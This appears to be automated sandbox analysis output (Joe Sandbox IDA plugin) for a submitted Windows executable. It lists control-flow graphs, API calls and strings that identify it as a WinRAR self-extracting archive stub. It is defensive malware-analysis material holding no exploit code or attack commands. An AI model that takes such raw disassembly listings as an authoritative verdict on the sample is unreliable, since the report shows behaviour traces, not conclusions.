                                          control_flow_graph 1025 f8a69b-f8a6bf call f9ec50 1028 f8a6c1-f8a6ce FindFirstFileW 1025->1028 1029 f8a727-f8a730 FindNextFileW 1025->1029 1030 f8a742-f8a7ff call f90602 call f8c310 call f915da * 3 1028->1030 1032 f8a6d0-f8a6e2 call f8bb03 1028->1032 1029->1030 1031 f8a732-f8a740 GetLastError 1029->1031 1036 f8a804-f8a811 1030->1036 1033 f8a719-f8a722 1031->1033 1040 f8a6fe-f8a707 GetLastError 1032->1040 1041 f8a6e4-f8a6fc FindFirstFileW 1032->1041 1033->1036 1043 f8a709-f8a70c 1040->1043 1044 f8a717 1040->1044 1041->1030 1041->1040 1043->1044 1046 f8a70e-f8a711 1043->1046 1044->1033 1046->1044 1048 f8a713-f8a715 1046->1048 1048->1033
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6C4
                                            • Part of subcall function 00F8BB03: _wcslen.LIBCMT ref: 00F8BB27
                                          • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6F2
                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6FE
                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A728
                                          • GetLastError.KERNEL32(?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A734
                                          Similarity
                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                          • String ID:
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,?,00FA7DC4,00000000,00FBC300,0000000C,00FA7F1B,00000000,00000002,00000000), ref: 00FA7E0F
                                          • TerminateProcess.KERNEL32(00000000,?,00FA7DC4,00000000,00FBC300,0000000C,00FA7F1B,00000000,00000002,00000000), ref: 00FA7E16
                                          • ExitProcess.KERNEL32 ref: 00FA7E28
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          APIs
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F9B7E5
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9B8D1
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B8EF
                                          • IsDialogMessageW.USER32(?,?), ref: 00F9B902
                                          • TranslateMessage.USER32(?), ref: 00F9B910
                                          • DispatchMessageW.USER32(?), ref: 00F9B91A
                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00F9B93D
                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00F9B960
                                          • GetDlgItem.USER32(?,00000068), ref: 00F9B983
                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F9B99E
                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FB35F4), ref: 00F9B9B1
                                            • Part of subcall function 00F9D453: _wcslen.LIBCMT ref: 00F9D47D
                                          • SetFocus.USER32(00000000), ref: 00F9B9B8
                                          • _swprintf.LIBCMT ref: 00F9BA24
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                            • Part of subcall function 00F9D4D4: GetDlgItem.USER32(00000068,00FDFCB8), ref: 00F9D4E8
                                            • Part of subcall function 00F9D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00F9AF07,00000001,?,?,00F9B7B9,00FB506C,00FDFCB8,00FDFCB8,00001000,00000000,00000000), ref: 00F9D510
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F9D51B
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FB35F4), ref: 00F9D529
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F9D53F
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F9D559
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F9D59D
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F9D5AB
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F9D5BA
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F9D5E1
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FB43F4), ref: 00F9D5F0
                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00F9BA68
                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00F9BA90
                                          • GetTickCount.KERNEL32 ref: 00F9BAAE
                                          • _swprintf.LIBCMT ref: 00F9BAC2
                                          • GetLastError.KERNEL32(?,00000011), ref: 00F9BAF4
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00F9BB43
                                          • _swprintf.LIBCMT ref: 00F9BB7C
                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00F9BBD0
                                          • GetCommandLineW.KERNEL32 ref: 00F9BBEA
                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00F9BC47
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00F9BC6F
                                          • Sleep.KERNEL32(00000064), ref: 00F9BCB9
                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00F9BCE2
                                          • CloseHandle.KERNEL32(00000000), ref: 00F9BCEB
                                          • _swprintf.LIBCMT ref: 00F9BD1E
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9BD7D
                                          • SetDlgItemTextW.USER32(?,00000065,00FB35F4), ref: 00F9BD94
                                          • GetDlgItem.USER32(?,00000065), ref: 00F9BD9D
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F9BDAC
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F9BDBB
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9BE68
                                          • _wcslen.LIBCMT ref: 00F9BEBE
                                          • _swprintf.LIBCMT ref: 00F9BEE8
                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F9BF32
                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00F9BF4C
                                          • GetDlgItem.USER32(?,00000068), ref: 00F9BF55
                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00F9BF6B
                                          • GetDlgItem.USER32(?,00000066), ref: 00F9BF85
                                          • SetWindowTextW.USER32(00000000,00FCA472), ref: 00F9BFA7
                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00F9C007
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9C01A
                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00F9C0BD
                                          • EnableWindow.USER32(00000000,00000000), ref: 00F9C197
                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00F9C1D9
                                            • Part of subcall function 00F9C73F: __EH_prolog.LIBCMT ref: 00F9C744
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9C1FD
                                          Strings
                                          Similarity
                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 268 f90863-f90886 call f9ec50 GetModuleHandleW 271 f90888-f9089f GetProcAddress 268->271 272 f908e7-f90b48 268->272 275 f908b9-f908c9 GetProcAddress 271->275 276 f908a1-f908b7 271->276 273 f90b4e-f90b59 call fa75fb 272->273 274 f90c14-f90c40 GetModuleFileNameW call f8c29a call f90602 272->274 273->274 286 f90b5f-f90b8d GetModuleFileNameW CreateFileW 273->286 291 f90c42-f90c4e call f8b146 274->291 277 f908cb-f908e0 275->277 278 f908e5 275->278 276->275 277->278 278->272 288 f90c08-f90c0f CloseHandle 286->288 289 f90b8f-f90b9b SetFilePointer 286->289 288->274 289->288 292 f90b9d-f90bb9 ReadFile 289->292 298 f90c7d-f90ca4 call f8c310 GetFileAttributesW 291->298 299 f90c50-f90c5b call f9081b 291->299 292->288 294 f90bbb-f90be0 292->294 295 f90bfd-f90c06 call f90371 294->295 295->288 305 f90be2-f90bfc call f9081b 295->305 308 f90cae 298->308 309 f90ca6-f90caa 298->309 299->298 307 f90c5d-f90c7b CompareStringW 299->307 305->295 307->298 307->309 312 f90cb0-f90cb5 308->312 309->291 311 f90cac 309->311 311->312 313 f90cec-f90cee 312->313 314 f90cb7 312->314 315 f90dfb-f90e05 313->315 316 f90cf4-f90d0b call f8c2e4 call f8b146 313->316 317 f90cb9-f90ce0 call f8c310 GetFileAttributesW 314->317 327 f90d0d-f90d6e call f9081b * 2 call f8e617 call f84092 call f8e617 call f9a7e4 316->327 328 f90d73-f90da6 call f84092 AllocConsole 316->328 323 f90cea 317->323 324 f90ce2-f90ce6 317->324 323->313 324->317 326 f90ce8 324->326 326->313 334 f90df3-f90df5 ExitProcess 327->334 333 f90da8-f90ded GetCurrentProcessId AttachConsole call fa3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 00F9087C
                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F9088E
                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F908BF
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F90B69
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F90B83
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F90B93
                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00FB3C7C,00000000), ref: 00F90BB1
                                          • CloseHandle.KERNEL32(00000000), ref: 00F90C09
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F90C1E
                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00FB3C7C,?,00000000,?,00000800), ref: 00F90C72
                                          • GetFileAttributesW.KERNEL32(?,?,00FB3C7C,00000800,?,00000000,?,00000800), ref: 00F90C9C
                                          • GetFileAttributesW.KERNEL32(?,?,00FB3D44,00000800), ref: 00F90CD8
                                            • Part of subcall function 00F9081B: GetSystemDirectoryW.KERNEL32(?,00000800,00FC81C8,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?,?), ref: 00F90836
                                            • Part of subcall function 00F9081B: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?), ref: 00F90858
                                          • _swprintf.LIBCMT ref: 00F90D4A
                                          • _swprintf.LIBCMT ref: 00F90D96
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • AllocConsole.KERNEL32 ref: 00F90D9E
                                          • GetCurrentProcessId.KERNEL32 ref: 00F90DA8
                                          • AttachConsole.KERNEL32(00000000), ref: 00F90DAF
                                          • _wcslen.LIBCMT ref: 00F90DC4
                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F90DD5
                                          • WriteConsoleW.KERNEL32(00000000), ref: 00F90DDC
                                          • Sleep.KERNEL32(00002710), ref: 00F90DE7
                                          • FreeConsole.KERNEL32 ref: 00F90DED
                                          • ExitProcess.KERNEL32 ref: 00F90DF5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F9C744
                                            • Part of subcall function 00F9B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F9B3FB
                                          • _wcslen.LIBCMT ref: 00F9CA0A
                                          • _wcslen.LIBCMT ref: 00F9CA13
                                          • SetWindowTextW.USER32(?,?), ref: 00F9CA71
                                          • _wcslen.LIBCMT ref: 00F9CAB3
                                          • _wcsrchr.LIBVCRUNTIME ref: 00F9CBFB
                                          • GetDlgItem.USER32(?,00000066), ref: 00F9CC36
                                          • SetWindowTextW.USER32(00000000,?), ref: 00F9CC46
                                          • SendMessageW.USER32(00000000,00000143,00000000,00FCA472), ref: 00F9CC54
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F9CC7F
                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F8DA70
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F8DAAC
                                            • Part of subcall function 00F8C29A: _wcslen.LIBCMT ref: 00F8C2A2
                                            • Part of subcall function 00F905DA: _wcslen.LIBCMT ref: 00F905E0
                                            • Part of subcall function 00F91B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F8BAE9,00000000,?,?,?,0001040C), ref: 00F91BA0
                                          • _wcslen.LIBCMT ref: 00F8DDE9
                                          • __fprintf_l.LIBCMT ref: 00F8DF1C
                                          Similarity
                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a

                                          APIs
                                            • Part of subcall function 00F9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9B579
                                            • Part of subcall function 00F9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B58A
                                            • Part of subcall function 00F9B568: IsDialogMessageW.USER32(0001040C,?), ref: 00F9B59E
                                            • Part of subcall function 00F9B568: TranslateMessage.USER32(?), ref: 00F9B5AC
                                            • Part of subcall function 00F9B568: DispatchMessageW.USER32(?), ref: 00F9B5B6
                                          • GetDlgItem.USER32(00000068,00FDFCB8), ref: 00F9D4E8
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00F9AF07,00000001,?,?,00F9B7B9,00FB506C,00FDFCB8,00FDFCB8,00001000,00000000,00000000), ref: 00F9D510
                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F9D51B
                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FB35F4), ref: 00F9D529
                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F9D53F
                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F9D559
                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F9D59D
                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F9D5AB
                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F9D5BA
                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F9D5E1
                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FB43F4), ref: 00F9D5F0
                                          Similarity
                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                          • String ID: \

                                          APIs
                                          • _wcslen.LIBCMT ref: 00F9D7AE
                                          • ShellExecuteExW.SHELL32(?), ref: 00F9D8DE
                                          • ShowWindow.USER32(?,00000000), ref: 00F9D91D
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00F9D959
                                          • CloseHandle.KERNEL32(?), ref: 00F9D97F
                                          • ShowWindow.USER32(?,00000001), ref: 00F9D9E1
                                          Similarity
                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                          • String ID: .exe$.inf

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FA5695,00FA5695,?,?,?,00FAABAC,00000001,00000001,2DE85006), ref: 00FAA9B5
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FAABAC,00000001,00000001,2DE85006,?,?,?), ref: 00FAAA3B
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FAAB35
                                          • __freea.LIBCMT ref: 00FAAB42
                                            • Part of subcall function 00FA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          • __freea.LIBCMT ref: 00FAAB4B
                                          • __freea.LIBCMT ref: 00FAAB70
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap

                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00FA3C35,?,?,00FE2088,00000000,?,00FA3D60,00000004,InitializeCriticalSectionEx,00FB6394,InitializeCriticalSectionEx,00000000), ref: 00FA3C03
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID: api-ms-

                                          APIs
                                          • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00F87760,?,00000005,?,00000011), ref: 00F8995F
                                          • GetLastError.KERNEL32(?,?,00F87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F8996C
                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00F87760,?,00000005,?), ref: 00F899A2
                                          • GetLastError.KERNEL32(?,?,00F87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F899AA
                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F899F9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$CreateErrorLast$Time
                                          • String ID:
                                          • API String ID: 1999340476-0

                                          Control-flow Graph

                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9B579
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B58A
                                          • IsDialogMessageW.USER32(0001040C,?), ref: 00F9B59E
                                          • TranslateMessage.USER32(?), ref: 00F9B5AC
                                          • DispatchMessageW.USER32(?), ref: 00F9B5B6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Message$DialogDispatchPeekTranslate
                                          • String ID:
                                          • API String ID: 1266772231-0

                                          Control-flow Graph

                                          APIs
                                          • GetClassNameW.USER32(?,?,00000050), ref: 00F9ABC2
                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00F9ABF9
                                            • Part of subcall function 00F91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F8C116,00000000,.exe,?,?,00000800,?,?,?,00F98E3C), ref: 00F91FD1
                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F9ABE9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                          • String ID: EDIT
                                          • API String ID: 4243998846-3080729518

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00F9081B: GetSystemDirectoryW.KERNEL32(?,00000800,00FC81C8,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?,?), ref: 00F90836
                                            • Part of subcall function 00F9081B: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?), ref: 00F90858
                                          • OleInitialize.OLE32(00000000), ref: 00F9AC2F
                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F9AC66
                                          • SHGetMalloc.SHELL32(00FC8438), ref: 00F9AC70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                          • String ID: riched20.dll
                                          • API String ID: 3498096277-3360196438

                                          Control-flow Graph

                                          APIs
                                          • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F9DBF4
                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F9DC30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: EnvironmentVariable
                                          • String ID: sfxcmd$sfxpar
                                          • API String ID: 1431749950-3493335439

                                          Control-flow Graph

                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00F89795
                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00F897AD
                                          • GetLastError.KERNEL32 ref: 00F897DF
                                          • GetLastError.KERNEL32 ref: 00F897FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FileHandleRead
                                          • String ID:
                                          • API String ID: 2244327787-0
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F8D710,00000000,00000000,?,00FAACDB,00F8D710,00000000,00000000,00000000,?,00FAAED8,00000006,FlsSetValue), ref: 00FAAD66
                                          • GetLastError.KERNEL32(?,00FAACDB,00F8D710,00000000,00000000,00000000,?,00FAAED8,00000006,FlsSetValue,00FB7970,FlsSetValue,00000000,00000364,?,00FA98B7), ref: 00FAAD72
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FAACDB,00F8D710,00000000,00000000,00000000,?,00FAAED8,00000006,FlsSetValue,00FB7970,FlsSetValue,00000000), ref: 00FAAD80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
